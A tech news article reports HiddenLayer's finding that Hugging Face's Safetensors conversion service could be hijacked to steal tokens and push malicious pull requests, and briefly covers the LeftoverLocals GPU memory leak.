Hugging Face Safetensors vulnerable to supply chain attacks

Hugging Face is harmless...right?
7 March 2024

Hugging Face – now with vulenrability.

• Hugging Face vulnerabilities revealed.
• Supply chain attacks can get into Hugging Face safetensors.
• That means the whole Hugging Face community could be under threat.

Recent research has found that the new Hugging Face Safetensors conversion services are vulnerable to supply chain attacks, with hackers able to hijack AI models submitted by users. Reported by The Hacker News, cybersecurity researchers from HiddenLayer discovered that it is “possible to send malicious pull requests with attacker-controlled data from the Hugging Face service to any repository on the platform.” The researchers also found that it was possible to “hijack any models that are submitted through the conversion service.”

For those who don’t know, Hugging Face is a collaboration platform used by software developers to host and work together on an infinite number of datasets, machine learning models, and applications, all of which are pre-trained. Users can build, implement, and train these to their choosing.

Vulnerabilities in Hugging Face

Safetensors, a format designed by Hugging Face, store tensors, prioritizing security. Users can also convert PyTorch models to Safetensor through a pull request if desired. Safetensors is in contrast to “pickles,” another format, which may have been exploited by malicious actors to deploy tools such as Mythic and Cobalt Strikes, and run unauthorized code.

The recent revelation of possible vulnerabilities comes as a shock to many of Hugging Face’s 1.2 million registered users. It became evident through the research that malicious pull requests could be accomplished via a hijacked model. Since the service should convert this model, it enables harmful actors to pose as the conversion bot and request modifications to any repository on the platform.

It’s also possible for hackers to extract tokens associated with SFConvertbot. This is a bot made to generate a pull request. These tokens can be extracted, sending out a dangerous pull request to any repository on the Hugging Face site. From here, a threat actor could manipulate the model, even implanting neural backdoors.

According to researchers, “an attacker could run any arbitrary code any time someone attempted to convert their model.” Essentially, a model could be hijacked upon conversion without the user even knowing it.

An attack could result in the theft of a user’s Hugging Face token if they try to convert their personal repository. Hackers may also be able to access datasets and internal models, resulting in malicious interference.

The complexities of these vulnerabilities don’t stop there. An adversary could exploit the ability for any users to submit a conversion request for a public repository, resulting in a possible modification or hijacking of a widely utilized model. That poses a substantial risk to the overall supply chain. Researchers summed this up by saying, “the conversion service has proven to be vulnerable and has had the potential to cause a widespread supply chain attack via the Hugging Face official service.”

Attackers could get access to a container that runs the service, and choose to compromise any models that have been converted by it.

Hugging Face - traditionally, bad things happen afterwards...

Hugging Face – traditionally, bad things happen afterwards…

The implications go beyond singular repositories. The overall trustworthiness and reliability of the Hugging Face service and its community is under threat.

Co-founder and CEO of Hidden Layer, Chris “Tito” Sestito, emphasized the effects this vulnerability could have on a wider scale, saying, “This vulnerability extends beyond any single company hosting a model. The compromise of the conversion service has the potential to rapidly affect the millions of users who rely on these models to kick-start their AI projects, creating a full supply chain issue. Users of the Hugging Face platform place trust not only in the models hosted there but also in the reputable companies behind them, such as Google and Microsoft, making them all the more susceptible to this type of attack.”

LeftoverLocals

Hidden Layer’s exposure to certain vulnerabilities comes just one month after Trail of Bits revealed a vulnerability known as LeftoverLocals (CVE-2023-4969, Common Vulnerability Scoring System (CVSS) score – 6.5). This particular security flaw enables the retrieval of data from general-purpose graphics processing units (GPGPUs), manufactured by Apple, AMD, Qualcomm, and Imagination. The CVSS score of 6.5 indicates that this vulnerability was on a moderate level of severity, putting sensitive data at risk.

Trail of Bits’ memory leak stemmed from a failure to isolate process memory. Therefore, a local attacker could gain access and read memory from various processes. This includes the interactive sessions of other users within a Large Language Model (LLM).

The Hugging Face vulnerabilities, as well as those at Trail of Bits, only emphasizes the need for AI technologies to have stricter security protocols in place. Currently, the adoption of AI is growing at such a rate that sufficient security measures cannot keep up. HiddenLayer is one company that is creating solutions for such shortcomings, with its AISec platform offering a range of products designed to protect ML models against malicious code injections and attacks.

Nevertheless, the revelation of Hugging Face’s Safetensors conversion tool issues gives us a stark reminder of the challenges faced by AI and machine learning sectors. Supply chain attacks could put the integrity of AI models at risk, as well as the ecosystems that rely on such technologies. Right now, investigations are continuing into the vulnerability, with the machine learning community on high alert, and more vigilant than ever before.